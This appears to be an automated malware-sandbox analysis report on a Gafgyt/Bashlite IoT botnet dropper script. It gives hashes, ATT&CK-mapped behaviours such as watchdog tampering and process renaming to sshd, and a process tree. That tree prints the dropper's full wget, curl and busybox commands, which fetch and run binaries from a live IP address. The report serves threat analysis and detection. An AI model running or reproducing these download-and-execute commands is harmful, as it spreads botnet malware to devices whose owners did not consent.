gafgyt | 6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417

Analysis

max time kernel
122s
max time network
147s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
08-12-2024 02:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
Size

6KB
MD5

b853a7496951ffa293c154a1c2ab0cef
SHA1

cd23d84bfa383cb3eef6b8a210a755323d278068
SHA256

6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417
SHA512

315201607fbfeb29173ced022cebb46a1c936377bb62407fdb73bb9a65426e24aff333c7e727e5fbb7351de6f71f919e1dcec3204b41d01d781dfcfc171bab18
SSDEEP

96:vl0lolAlUlElAlwlclElElglUl6LlbzPnTjn37jjHTLXjTp+FH7RjdOMX+xj+wqd:oMVB3

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 13 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-2.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-4.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-6.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-8.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt
behavioral4/files/fstream-10.dat	family_gafgyt
behavioral4/files/fstream-11.dat	family_gafgyt
behavioral4/files/fstream-12.dat	family_gafgyt
behavioral4/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 54 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
909	chmod
723	chmod
796	chmod
812	chmod
1041	chmod
844	chmod
985	chmod
1026	chmod
949	chmod
981	chmod
749	chmod
764	chmod
929	chmod
899	chmod
904	chmod
965	chmod
973	chmod
1009	chmod
737	chmod
744	chmod
944	chmod
887	chmod
961	chmod
1036	chmod
957	chmod
774	chmod
839	chmod
1031	chmod
894	chmod
914	chmod
977	chmod
1051	chmod
1046	chmod
1066	chmod
924	chmod
989	chmod
993	chmod
934	chmod
969	chmod
997	chmod
1001	chmod
1014	chmod
1021	chmod
1056	chmod
754	chmod
882	chmod
953	chmod
1061	chmod
769	chmod
939	chmod
1005	chmod
759	chmod
834	chmod
919	chmod

Executes dropped EXE 52 IoCs

ioc	pid	Process
/tmp/m-.ips	725	m-.ips
/tmp/m-i.p.-se.l	738	m-i.p.-se.l
/tmp/s-..-h-.4	745	s-..-h-.4
/tmp/x.8-.-6.-	750	x.8-.-6.-
/tmp/a.-r.-m6	755	a.-r.-m6
/tmp/i--6.-.86	760	i--6.-.86
/tmp/p--.-pc	765	p--.-pc
/tmp/i5.-.8..-6	770	i5.-.8..-6
/tmp/m.-..-6-.-8k	775	m.-..-6-.-8k
/tmp/s-.-pa.-rc	797	s-.-pa.-rc
/tmp/a-.-r.-m.-4	813	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	835	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	840	a.r.-.m7
/tmp/m-.ips	883	m-.ips
/tmp/m-i.p.-se.l	888	m-i.p.-se.l
/tmp/s-..-h-.4	895	s-..-h-.4
/tmp/x.8-.-6.-	900	x.8-.-6.-
/tmp/a.-r.-m6	905	a.-r.-m6
/tmp/i--6.-.86	910	i--6.-.86
/tmp/p--.-pc	915	p--.-pc
/tmp/i5.-.8..-6	920	i5.-.8..-6
/tmp/m.-..-6-.-8k	925	m.-..-6-.-8k
/tmp/s-.-pa.-rc	930	s-.-pa.-rc
/tmp/a-.-r.-m.-4	935	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	940	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	945	a.r.-.m7
/tmp/p-.-.p.-.c	950	p-.-.p.-.c
/tmp/m-.ips	954	m-.ips
/tmp/m-i.p.-se.l	958	m-i.p.-se.l
/tmp/s-..-h-.4	962	s-..-h-.4
/tmp/x.8-.-6.-	966	x.8-.-6.-
/tmp/a.-r.-m6	970	a.-r.-m6
/tmp/i--6.-.86	974	i--6.-.86
/tmp/p--.-pc	978	p--.-pc
/tmp/i5.-.8..-6	982	i5.-.8..-6
/tmp/m.-..-6-.-8k	986	m.-..-6-.-8k
/tmp/s-.-pa.-rc	990	s-.-pa.-rc
/tmp/a-.-r.-m.-4	994	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	998	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	1002	a.r.-.m7
/tmp/p-.-.p.-.c	1006	p-.-.p.-.c
/tmp/m-.ips	1010	m-.ips
/tmp/m-i.p.-se.l	1015	m-i.p.-se.l
/tmp/s-..-h-.4	1022	s-..-h-.4
/tmp/x.8-.-6.-	1027	x.8-.-6.-
/tmp/a.-r.-m6	1032	a.-r.-m6
/tmp/i--6.-.86	1037	i--6.-.86
/tmp/p--.-pc	1042	p--.-pc
/tmp/i5.-.8..-6	1047	i5.-.8..-6
/tmp/m.-..-6-.-8k	1052	m.-..-6-.-8k
/tmp/s-.-pa.-rc	1057	s-.-pa.-rc
/tmp/a-.-r.-m.-4	1062	a-.-r.-m.-4

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	m-i.p.-se.l
File opened for modification	/dev/misc/watchdog	m-i.p.-se.l
File opened for modification	/dev/watchdog	m-i.p.-se.l
File opened for modification	/dev/misc/watchdog	m-i.p.-se.l
File opened for modification	/dev/watchdog	m-i.p.-se.l
File opened for modification	/dev/misc/watchdog	m-i.p.-se.l

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l

Changes its process name 3 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	sshd	738	m-i.p.-se.l
Changes the process name, possibly in an attempt to hide itself	sshd	888	m-i.p.-se.l
Changes the process name, possibly in an attempt to hide itself	sshd	1015	m-i.p.-se.l

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 11 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1012	rm
706	wget
725	m-.ips
728	rm
847	curl
885	rm
954	m-.ips
883	m-.ips
955	rm
1008	busybox
1010	m-.ips

Writes file to tmp directory 39 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/a.-r.-m6	curl
File opened for modification	/tmp/s-..-h-.4	busybox
File opened for modification	/tmp/i--6.-.86	busybox
File opened for modification	/tmp/a.-.--.r.--m-.--5	wget
File opened for modification	/tmp/a.-.--.r.--m-.--5	busybox
File opened for modification	/tmp/m-.ips	wget
File opened for modification	/tmp/x.8-.-6.-	wget
File opened for modification	/tmp/a-.-r.-m.-4	wget
File opened for modification	/tmp/p--.-pc	curl
File opened for modification	/tmp/a-.-r.-m.-4	curl
File opened for modification	/tmp/x.8-.-6.-	busybox
File opened for modification	/tmp/a-.-r.-m.-4	busybox
File opened for modification	/tmp/a.-r.-m6	wget
File opened for modification	/tmp/i--6.-.86	wget
File opened for modification	/tmp/m.-..-6-.-8k	wget
File opened for modification	/tmp/a.-.--.r.--m-.--5	curl
File opened for modification	/tmp/a.r.-.m7	curl
File opened for modification	/tmp/s-..-h-.4	wget
File opened for modification	/tmp/p--.-pc	wget
File opened for modification	/tmp/s-.-pa.-rc	wget
File opened for modification	/tmp/a.r.-.m7	wget
File opened for modification	/tmp/m.-..-6-.-8k	curl
File opened for modification	/tmp/p-.-.p.-.c	curl
File opened for modification	/tmp/m-i.p.-se.l	busybox
File opened for modification	/tmp/m.-..-6-.-8k	busybox
File opened for modification	/tmp/m-i.p.-se.l	wget
File opened for modification	/tmp/i5.-.8..-6	wget
File opened for modification	/tmp/x.8-.-6.-	curl
File opened for modification	/tmp/i5.-.8..-6	curl
File opened for modification	/tmp/m-.ips	busybox
File opened for modification	/tmp/a.-r.-m6	busybox
File opened for modification	/tmp/i5.-.8..-6	busybox
File opened for modification	/tmp/s-.-pa.-rc	busybox
File opened for modification	/tmp/m-.ips	curl
File opened for modification	/tmp/m-i.p.-se.l	curl
File opened for modification	/tmp/s-..-h-.4	curl
File opened for modification	/tmp/s-.-pa.-rc	curl
File opened for modification	/tmp/p--.-pc	busybox
File opened for modification	/tmp/i--6.-.86	curl

/tmp/6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
/tmp/6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
1⤵
PID:703
- /usr/bin/wget
  wget http://93.123.85.60/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:706
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:723
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:725
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:728
- /usr/bin/wget
  wget http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:729
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:738
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:742
- /usr/bin/wget
  wget http://93.123.85.60/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:743
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:747
- /usr/bin/wget
  wget http://93.123.85.60/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:748
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:750
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:752
- /usr/bin/wget
  wget http://93.123.85.60/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:753
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:757
- /usr/bin/wget
  wget http://93.123.85.60/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:758
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:760
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:762
- /usr/bin/wget
  wget http://93.123.85.60/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:763
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:765
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:767
- /usr/bin/wget
  wget http://93.123.85.60/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:768
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:770
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:772
- /usr/bin/wget
  wget http://93.123.85.60/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:774
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:775
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:777
- /usr/bin/wget
  wget http://93.123.85.60/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:779
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:797
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:800
- /usr/bin/wget
  wget http://93.123.85.60/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:801
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:813
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:817
- /usr/bin/wget
  wget http://93.123.85.60/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:818
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:835
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:837
- /usr/bin/wget
  wget http://93.123.85.60/a.r.-.m7
  2⤵
  - Writes file to tmp directory
  PID:838
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:839
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:840
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:842
- /usr/bin/wget
  wget http://93.123.85.60/p-.-.p.-.c
  2⤵
  PID:843
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  PID:845
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:846
- /usr/bin/curl
  curl -O http://93.123.85.60/m-.ips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:847
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:883
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:885
- /usr/bin/curl
  curl -O http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:886
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:888
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:892
- /usr/bin/curl
  curl -O http://93.123.85.60/s-..-h-.4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:895
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:897
- /usr/bin/curl
  curl -O http://93.123.85.60/x.8-.-6.-
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:898
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:899
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:900
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:902
- /usr/bin/curl
  curl -O http://93.123.85.60/a.-r.-m6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:903
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:905
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:907
- /usr/bin/curl
  curl -O http://93.123.85.60/i--6.-.86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:908
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:912
- /usr/bin/curl
  curl -O http://93.123.85.60/p--.-pc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:914
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:915
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:917
- /usr/bin/curl
  curl -O http://93.123.85.60/i5.-.8..-6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:918
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://93.123.85.60/m.-..-6-.-8k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:924
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:925
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:927
- /usr/bin/curl
  curl -O http://93.123.85.60/s-.-pa.-rc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:928
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:929
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:930
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:932
- /usr/bin/curl
  curl -O http://93.123.85.60/a-.-r.-m.-4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:933
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:934
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:935
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:937
- /usr/bin/curl
  curl -O http://93.123.85.60/a.-.--.r.--m-.--5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:938
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:939
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:940
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:942
- /usr/bin/curl
  curl -O http://93.123.85.60/a.r.-.m7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:943
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:947
- /usr/bin/curl
  curl -O http://93.123.85.60/p-.-.p.-.c
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:948
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:949
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  - Executes dropped EXE
  PID:950
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:951
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:953
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:954
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:955
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:957
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:958
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:959
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:963
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:967
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:969
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:970
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:971
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:973
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:974
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:975
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:977
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:978
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:979
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:981
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:982
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:983
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:985
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:986
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:987
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:990
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:991
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:995
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:997
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:998
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:999
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:1001
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:1002
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:1003
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:1005
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  - Executes dropped EXE
  PID:1006
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:1007
- /bin/busybox
  busybox wget -O m-.ips http://93.123.85.60/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1008
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:1009
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1010
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:1012
- /bin/busybox
  busybox wget -O m-i.p.-se.l http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:1013
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:1014
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1015
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:1019
- /bin/busybox
  busybox wget -O s-..-h-.4 http://93.123.85.60/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:1020
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:1021
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:1022
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:1024
- /bin/busybox
  busybox wget -O x.8-.-6.- http://93.123.85.60/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:1025
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:1026
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:1027
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:1029
- /bin/busybox
  busybox wget -O a.-r.-m6 http://93.123.85.60/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:1030
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:1031
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:1032
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:1034
- /bin/busybox
  busybox wget -O i--6.-.86 http://93.123.85.60/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:1035
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:1036
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:1037
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:1039
- /bin/busybox
  busybox wget -O p--.-pc http://93.123.85.60/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:1040
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:1041
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:1042
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:1044
- /bin/busybox
  busybox wget -O i5.-.8..-6 http://93.123.85.60/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:1045
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:1046
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:1047
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:1049
- /bin/busybox
  busybox wget -O m.-..-6-.-8k http://93.123.85.60/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
